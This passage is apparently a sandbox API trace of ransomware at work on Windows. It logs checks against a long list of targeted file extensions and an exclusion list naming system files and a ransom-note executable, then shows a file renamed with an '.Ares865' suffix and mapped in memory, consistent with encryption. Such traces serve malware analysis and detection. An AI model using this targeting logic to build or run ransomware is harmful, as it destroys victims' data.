lpString2="mud") returned -1 [0087.314] lstrlenW (lpString="mwb") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.314] lstrlenW (lpString="myd") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.314] lstrlenW (lpString="ndf") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.314] lstrlenW (lpString="nnt") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.314] lstrlenW (lpString="nrmlib") returned 6 [0087.314] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.314] lstrlenW (lpString="ns2") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.314] lstrlenW (lpString="ns3") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.314] lstrlenW (lpString="ns4") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.314] lstrlenW (lpString="nsf") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.314] lstrlenW (lpString="nv") returned 2 [0087.314] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.314] lstrlenW (lpString="nv2") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.314] lstrlenW (lpString="nwdb") returned 4 [0087.314] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.314] lstrlenW (lpString="nyf") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.314] lstrlenW (lpString="odb") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.315] lstrlenW (lpString="odb") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.315] lstrlenW (lpString="oqy") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.315] lstrlenW (lpString="ora") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.315] lstrlenW (lpString="orx") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.315] lstrlenW (lpString="owc") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.315] lstrlenW (lpString="p96") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.315] lstrlenW (lpString="p97") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.315] lstrlenW (lpString="pan") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.315] lstrlenW (lpString="pdb") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.315] lstrlenW (lpString="pdm") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.315] lstrlenW (lpString="pnz") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.315] lstrlenW (lpString="qry") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.315] lstrlenW (lpString="qvd") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.315] lstrlenW (lpString="rbf") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.315] lstrlenW (lpString="rctd") returned 4 [0087.315] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.315] lstrlenW (lpString="rod") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.315] lstrlenW (lpString="rodx") returned 4 [0087.315] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.315] lstrlenW (lpString="rpd") returned 3 [0087.315] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.315] lstrlenW (lpString="rsd") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.316] lstrlenW (lpString="sas7bdat") returned 8 [0087.316] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.316] lstrlenW (lpString="sbf") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.316] lstrlenW (lpString="scx") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.316] lstrlenW (lpString="sdb") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.316] lstrlenW (lpString="sdc") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.316] lstrlenW (lpString="sdf") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.316] lstrlenW (lpString="sis") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.316] lstrlenW (lpString="spq") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.316] lstrlenW (lpString="te") returned 2 [0087.316] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.316] lstrlenW (lpString="teacher") returned 7 [0087.316] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.316] lstrlenW (lpString="tmd") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.316] lstrlenW (lpString="tps") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.316] lstrlenW (lpString="trc") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.316] lstrlenW (lpString="trc") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.316] lstrlenW (lpString="trm") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.316] lstrlenW (lpString="udb") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.316] lstrlenW (lpString="udl") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.316] lstrlenW (lpString="usr") returned 3 [0087.316] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.317] lstrlenW (lpString="v12") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.317] lstrlenW (lpString="vis") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.317] lstrlenW (lpString="vpd") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.317] lstrlenW (lpString="vvv") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.317] lstrlenW (lpString="wdb") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.317] lstrlenW (lpString="wmdb") returned 4 [0087.317] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.317] lstrlenW (lpString="wrk") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.317] lstrlenW (lpString="xdb") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.317] lstrlenW (lpString="xld") returned 3 [0087.317] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.317] lstrlenW (lpString="xmlff") returned 5 [0087.317] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.317] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.Ares865") returned 80 [0087.317] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.318] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.319] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145760) returned 1 [0087.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.319] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.320] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23c60, lpName=0x0) returned 0x15c [0087.322] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23c60) returned 0x420000 [0087.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.330] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.330] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.330] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0087.332] CloseHandle (hObject=0x15c) returned 1 [0087.332] CloseHandle (hObject=0x118) returned 1 [0087.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.333] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="..") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="windows") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="temp") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="boot") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ids.txt") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="perflogs") returned 1 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="MSBuild") returned 1 [0087.333] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0087.333] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0087.333] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLINTL32.REST.trx_dll" | out: lpString1="XLINTL32.REST.trx_dll") returned="XLINTL32.REST.trx_dll" [0087.333] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0087.333] lstrlenW (lpString="Ares865") returned 7 [0087.333] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.333] lstrlenW (lpString=".dll") returned 4 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".dll") returned 1 [0087.333] lstrlenW (lpString=".lnk") returned 4 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".lnk") returned 1 [0087.333] lstrlenW (lpString=".ini") returned 4 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".ini") returned 1 [0087.333] lstrlenW (lpString=".sys") returned 4 [0087.333] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".sys") returned 1 [0087.334] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0087.334] lstrlenW (lpString="bak") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.334] lstrlenW (lpString="ba_") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.334] lstrlenW (lpString="dbb") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.334] lstrlenW (lpString="vmdk") returned 4 [0087.334] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.334] lstrlenW (lpString="rar") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.334] lstrlenW (lpString="zip") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.334] lstrlenW (lpString="tgz") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.334] lstrlenW (lpString="vbox") returned 4 [0087.334] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.334] lstrlenW (lpString="vdi") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.334] lstrlenW (lpString="vhd") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.334] lstrlenW (lpString="vhdx") returned 4 [0087.334] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.334] lstrlenW (lpString="avhd") returned 4 [0087.334] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.334] lstrlenW (lpString="db") returned 2 [0087.334] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.334] lstrlenW (lpString="db2") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.334] lstrlenW (lpString="db3") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.334] lstrlenW (lpString="dbf") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.334] lstrlenW (lpString="mdf") returned 3 [0087.334] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.334] lstrlenW (lpString="mdb") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.335] lstrlenW (lpString="sql") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.335] lstrlenW (lpString="sqlite") returned 6 [0087.335] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.335] lstrlenW (lpString="sqlite3") returned 7 [0087.335] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.335] lstrlenW (lpString="sqlitedb") returned 8 [0087.335] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.335] lstrlenW (lpString="xml") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.335] lstrlenW (lpString="$er") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.335] lstrlenW (lpString="4dd") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.335] lstrlenW (lpString="4dl") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.335] lstrlenW (lpString="^^^") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.335] lstrlenW (lpString="abs") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.335] lstrlenW (lpString="abx") returned 3 [0087.335] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.335] lstrlenW (lpString="accdb") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.335] lstrlenW (lpString="accdc") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.335] lstrlenW (lpString="accde") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.335] lstrlenW (lpString="accdr") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.335] lstrlenW (lpString="accdt") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.335] lstrlenW (lpString="accdw") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.335] lstrlenW (lpString="accft") returned 5 [0087.335] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.336] lstrlenW (lpString="adb") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.336] lstrlenW (lpString="adb") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.336] lstrlenW (lpString="ade") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.336] lstrlenW (lpString="adf") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.336] lstrlenW (lpString="adn") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.336] lstrlenW (lpString="adp") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.336] lstrlenW (lpString="alf") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.336] lstrlenW (lpString="ask") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.336] lstrlenW (lpString="btr") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.336] lstrlenW (lpString="cat") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.336] lstrlenW (lpString="cdb") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.336] lstrlenW (lpString="ckp") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.336] lstrlenW (lpString="cma") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.336] lstrlenW (lpString="cpd") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.336] lstrlenW (lpString="dacpac") returned 6 [0087.336] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.336] lstrlenW (lpString="dad") returned 3 [0087.336] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.336] lstrlenW (lpString="dadiagrams") returned 10 [0087.336] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.336] lstrlenW (lpString="daschema") returned 8 [0087.336] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.336] lstrlenW (lpString="db-journal") returned 10 [0087.337] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.337] lstrlenW (lpString="db-shm") returned 6 [0087.337] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.337] lstrlenW (lpString="db-wal") returned 6 [0087.337] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.337] lstrlenW (lpString="dbc") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.337] lstrlenW (lpString="dbs") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.337] lstrlenW (lpString="dbt") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.337] lstrlenW (lpString="dbv") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.337] lstrlenW (lpString="dbx") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.337] lstrlenW (lpString="dcb") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.337] lstrlenW (lpString="dct") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.337] lstrlenW (lpString="dcx") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.337] lstrlenW (lpString="ddl") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.337] lstrlenW (lpString="dlis") returned 4 [0087.337] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.337] lstrlenW (lpString="dp1") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.337] lstrlenW (lpString="dqy") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.337] lstrlenW (lpString="dsk") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.337] lstrlenW (lpString="dsn") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.337] lstrlenW (lpString="dtsx") returned 4 [0087.337] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.337] lstrlenW (lpString="dxl") returned 3 [0087.337] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.338] lstrlenW (lpString="eco") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.338] lstrlenW (lpString="ecx") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.338] lstrlenW (lpString="edb") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.338] lstrlenW (lpString="epim") returned 4 [0087.338] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.338] lstrlenW (lpString="fcd") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.338] lstrlenW (lpString="fdb") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.338] lstrlenW (lpString="fic") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.338] lstrlenW (lpString="flexolibrary") returned 12 [0087.338] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.338] lstrlenW (lpString="fm5") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.338] lstrlenW (lpString="fmp") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.338] lstrlenW (lpString="fmp12") returned 5 [0087.338] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.338] lstrlenW (lpString="fmpsl") returned 5 [0087.338] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.338] lstrlenW (lpString="fol") returned 3 [0087.338] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.346] lstrlenW (lpString="fp3") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.346] lstrlenW (lpString="fp4") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.346] lstrlenW (lpString="fp5") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.346] lstrlenW (lpString="fp7") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.346] lstrlenW (lpString="fpt") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.346] lstrlenW (lpString="frm") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.346] lstrlenW (lpString="gdb") returned 3 [0087.346] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.347] lstrlenW (lpString="gdb") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.347] lstrlenW (lpString="grdb") returned 4 [0087.347] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.347] lstrlenW (lpString="gwi") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.347] lstrlenW (lpString="hdb") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.347] lstrlenW (lpString="his") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.347] lstrlenW (lpString="ib") returned 2 [0087.347] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.347] lstrlenW (lpString="idb") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.347] lstrlenW (lpString="ihx") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.347] lstrlenW (lpString="itdb") returned 4 [0087.347] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.347] lstrlenW (lpString="itw") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.347] lstrlenW (lpString="jet") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.347] lstrlenW (lpString="jtx") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.347] lstrlenW (lpString="kdb") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.347] lstrlenW (lpString="kexi") returned 4 [0087.347] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.347] lstrlenW (lpString="kexic") returned 5 [0087.347] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.347] lstrlenW (lpString="kexis") returned 5 [0087.347] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.347] lstrlenW (lpString="lgc") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.347] lstrlenW (lpString="lwx") returned 3 [0087.347] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.347] lstrlenW (lpString="maf") returned 3 [0087.348] lstrcmpiW (lpString1="dll", 